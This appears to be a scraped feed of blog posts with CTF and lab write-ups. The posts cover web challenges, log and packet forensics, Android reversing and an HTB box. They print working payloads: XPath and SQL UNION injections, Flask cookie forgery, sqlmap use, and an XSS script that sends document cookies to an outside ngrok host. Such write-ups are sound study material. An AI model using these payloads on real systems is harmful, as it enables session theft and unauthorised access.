6 7 8 9 10 11 12  Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree}   Security Misconfiguration 1 2 3 4 5 6 7 8 9 10  Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17}   XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24  Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss   Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 11  Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? denial of service   Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 12  1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag}   Insecure Deserialization - Code Execution 1 2 3 4 5 6 7  flag.txt 4a69a7ff9fd68   Components with know vulns 1 2 3 4 5 6 7 8 9  How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611   Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 11  What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force   ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23  //registration  if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login  if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp }   With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 6  user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character  lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1    So i sent the request for registration with the password as two smileys and login with the same password. In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 6 7  curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login    The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\n web category\n Graph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 2  {__schema{types{name,fields{name}}}}   You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . It was base64 encoded , so we decode it to get the flag\n X marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1  SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php   This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 2  \u0026#39;or 1=1 or\u0026#39;   this is able to bypass login and i get the result\n1 2  {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;}   to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 2  \u0026#39;or position()=3 or\u0026#39;   by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 2  {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;}    secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 4  flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;}   We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 5 6  flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI   Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\n forensics category\n SnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\n Sniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\n SnifferDog3 What version of Jenkins is running on 192.168.56.103? shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\n SnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n ","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n 1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 3  ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx   Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n 2. chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7  Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3}   Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 3  ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx   This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 3  ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/   You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 3  ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation   workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups  Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\n Idoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 12  if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin  if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt  $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo \u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } }   it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\n Blank This challenge tested knowledge is sql.\n1 2 3  db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; {   as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 5  app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); }   THe username had to be \u0026ldquo;admin\u0026rdquo;. so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5  if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;);    Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28  def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag   to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19  from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image()   you also have to run the following command to set the exit data\n1 2 3  exiftool -PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png    Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\n Login This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 5  pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi   the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 6  xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34;   Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n ","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1  How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\n What is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\n Which city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\n How many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\n What is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\n What machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\n What is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\n What was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. The MAC address is on the blue line I have highlighted:\n What email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\n DEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\n The above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups  blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. Read more here\nwe can use this sql statement to get the blob\n1 2 3  select data from blobber where id=238   Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\n ninety one In this challenge you are provided with an encoded string\n1  @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P   I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2  flag{dfb88c7d9ca38e71dc27e1072fc43d1b}    glasses  This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 3  flag{8084e4530cf649814456f2a291eb81e9}    web category  starwars  In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 7  \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt;   the flag will be returned in base64 format. Use it in the browser to access /admin page and the flag\n misc category  zombies  In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category  This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak  In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 2  adb install jninjaspeak.apk   Decompile the application using apktool\n1 2 3 4  use : apktool -r -s d jninjaspeak.apk   We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\n Fortune teller  For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\n wheres waldo  In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 5  mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute();   the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29  import requests def calculate_distance(latitude, longitude): url = f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move()   The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 5  lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest   from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 5  Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9   final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 3  open port 22 open port 50015   a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 2  \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34;   I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21  POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]}   I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13  +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+   We can login to ssh as the user sau. The we read user.txt\n I uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 6  Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally   Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\n REFERENCES for gprc and other ways to expoit 